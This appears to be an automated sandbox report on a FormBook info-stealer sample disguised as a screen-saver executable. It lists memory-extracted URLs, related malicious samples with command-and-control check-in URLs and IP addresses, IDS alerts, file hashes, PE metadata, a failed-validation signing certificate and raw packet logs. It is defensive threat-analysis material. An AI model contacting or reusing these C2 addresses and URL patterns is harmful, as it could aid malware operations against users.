                                                                                                                                                        high
                                                                                                                                                        https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.goodfont.co.krMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.typography.netDMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://assets.iv.lt/default.cssreplace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.galapagosdesign.com/staff/dennis.htmMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://assets.iv.lt/images/icon.pngfirefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backupreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostingreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.fonts.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.sandoll.co.krMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.sakkal.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.iv.lt/talpinimo-planai/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                            high
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1438436
Start date and time: 2024-05-08 18:19:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MR-239-1599-A.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@19/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 184
• Number of non-executed functions: 281
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: MR-239-1599-A.scr.exe
Time | Type | Description
18:19:54 | API Interceptor | 1x Sleep call for process: MR-239-1599-A.scr.exe modified
18:21:04 | API Interceptor | 9056490x Sleep call for process: replace.exe modified
                                                                                                                                                                                                        International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                                                                                                                                                                                                        00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                                                                                                                                                                                                        Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                                                        00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                                                                                                                                        Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                                                                                                                                        003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                                                                                                                                        Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                        UNIFIEDLAYER-AS-1USletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 162.240.81.18
                                                                                                                                                                                                        p29D3FgSJF3zkbt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 162.241.61.23
                                                                                                                                                                                                        Payment Copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.129.60
                                                                                                                                                                                                        IUCrkcRx5g.exeGet hashmaliciousAgentTesla, Discord Token Stealer, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.254.232.209
                                                                                                                                                                                                        https://t.co/q6ERXNBypPGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.241.63.82
                                                                                                                                                                                                        5HR6GXEamJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 50.116.87.114
                                                                                                                                                                                                        Fiyat Teklifi_Yilmaziselbiseleri scan-10523 2024935164- BUET 07.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 108.167.140.123
                                                                                                                                                                                                        BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.137.4
                                                                                                                                                                                                        Purchase Order_#400388875.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 192.185.143.105
                                                                                                                                                                                                        DHL OUTSTANDING.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 50.87.253.239
                                                                                                                                                                                                        DNC-ASDimensionNetworkCommunicationLimitedHKDagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 147.92.36.247
                                                                                                                                                                                                        factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 147.92.36.247
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.125.69
                                                                                                                                                                                                        FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.125.68
                                                                                                                                                                                                        FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 103.93.127.88
                                                                                                                                                                                                        INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 103.93.124.160
                                                                                                                                                                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 103.93.124.160
                                                                                                                                                                                                        ONEANDONE-ASBrauerstrasse48DEletter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.76.128.34
                                                                                                                                                                                                        p29D3FgSJF3zkbt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.46
                                                                                                                                                                                                        what is a mutual legal reserve company 20594.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 77.68.5.26
                                                                                                                                                                                                        Order confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 212.227.172.253
                                                                                                                                                                                                        Forligsmnd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 217.76.132.187
                                                                                                                                                                                                        RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.185
                                                                                                                                                                                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 217.160.0.111
                                                                                                                                                                                                        LS24SDE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 217.160.0.163
                                                                                                                                                                                                        payment-order90094983.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 213.171.195.105
                                                                                                                                                                                                        kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 217.160.0.111
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.9588557022835715
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                        File name:MR-239-1599-A.scr.exe
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5:f53a5b00eaa86439c9bf502a7550f48a
                                                                                                                                                                                                        SHA1:e4f80447b09e17553bcbd8925662c9d1d3560ec7
                                                                                                                                                                                                        SHA256:f82f959fe8660a9975cbd0255ba069507af5bdb24dc88b47b275ff98fbae0afb
                                                                                                                                                                                                        SHA512:801bd0b24a9beba576510c0fec2611280845dfe08c7b2e6af4db1a9fff15d49b71e6db0d80ceaae2bea4884b41372f8f0ef15834c7883abcc9cb44a6f9dbf960
                                                                                                                                                                                                        SSDEEP:12288:OyniETpbHidP4i6ilyczuHQYIHbyVyi3z7xdbWOfOEmi89Dj3TBurYcutGAkR:n7bHJQlw5VV37idXlDBY4Mn
                                                                                                                                                                                                        TLSH:19F4231177196F03F3A928305AA980419FB593F37052C64F52C775AF0AE97280B96BBF
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:f..............0..8...(.......V... ...`....@.. ....................................@................................
                                                                                                                                                                                                        Icon Hash:447a705452e4f047
                                                                                                                                                                                                        Entrypoint:0x4b560e
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x663AEBAA [Wed May 8 03:04:10 2024 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                        • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                                                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                                                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                                                                                        Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                                                                                                        Instruction
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb55ba          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb6000          0x19a0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xb6800          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb8000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xb3ec4          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb3634 | 0xb3800 | aaeec8506b97a9642dc890031e7bf6bf | False | 0.9729255527506964 | data | 7.975940518665788 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb6000 | 0x19a0 | 0x2000 | 24297bfeab57383e71c32d50eeb927b6 | False | 0.2708740234375 | data | 5.681453507468558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb8000 | 0xc | 0x800 | 352c480b2212d6f6727fe77e6f5fb30b | False | 0.015625 | data | 0.03037337037012526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb6148 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.2628986866791745 |
| RT_ICON | 0xb71f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.525709219858156 |
| RT_GROUP_ICON | 0xb7658 | 0x22 | data | | | 0.9411764705882353 |
| RT_GROUP_ICON | 0xb767c | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xb7690 | 0x310 | data | | | 0.46938775510204084 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 05/08/24-18:23:04.241190 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49772 | 80 | 192.168.2.4 | 103.93.125.69 |
| 05/08/24-18:21:29.283237 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49752 | 80 | 192.168.2.4 | 217.76.128.34 |
| 05/08/24-18:20:40.991637 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.4 | 79.98.25.1 |
| 05/08/24-18:21:13.889976 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49748 | 80 | 192.168.2.4 | 64.190.62.22 |
| 05/08/24-18:22:25.343188 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49764 | 80 | 192.168.2.4 | 203.161.46.103 |
| 05/08/24-18:22:48.893765 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49768 | 80 | 192.168.2.4 | 162.240.81.18 |
| 05/08/24-18:22:02.183176 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49760 | 80 | 192.168.2.4 | 178.211.137.59 |
| 05/08/24-18:23:53.287883 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49780 | 80 | 192.168.2.4 | 91.195.240.19 |
| 05/08/24-18:23:28.557719 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49776 | 80 | 192.168.2.4 | 3.73.27.108 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                        May 8, 2024 18:21:26.767348051 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767359018 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767375946 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767388105 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767841101 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767882109 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.767904043 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772283077 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772459030 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772473097 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772486925 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772499084 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772512913 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772517920 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772527933 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772543907 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:26.772555113 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772555113 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:26.772584915 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:27.936732054 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:28.955960989 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.281299114 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.281390905 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.283236980 CEST4975280192.168.2.4217.76.128.34
                                                                                                                                                                                                        May 8, 2024 18:21:29.607954979 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612488031 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612510920 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612524986 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612540007 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612554073 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612570047 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612584114 CEST8049752217.76.128.34192.168.2.4
                                                                                                                                                                                                        May 8, 2024 18:21:29.612596989 CEST8049752217.76.128.34192.168.2.4
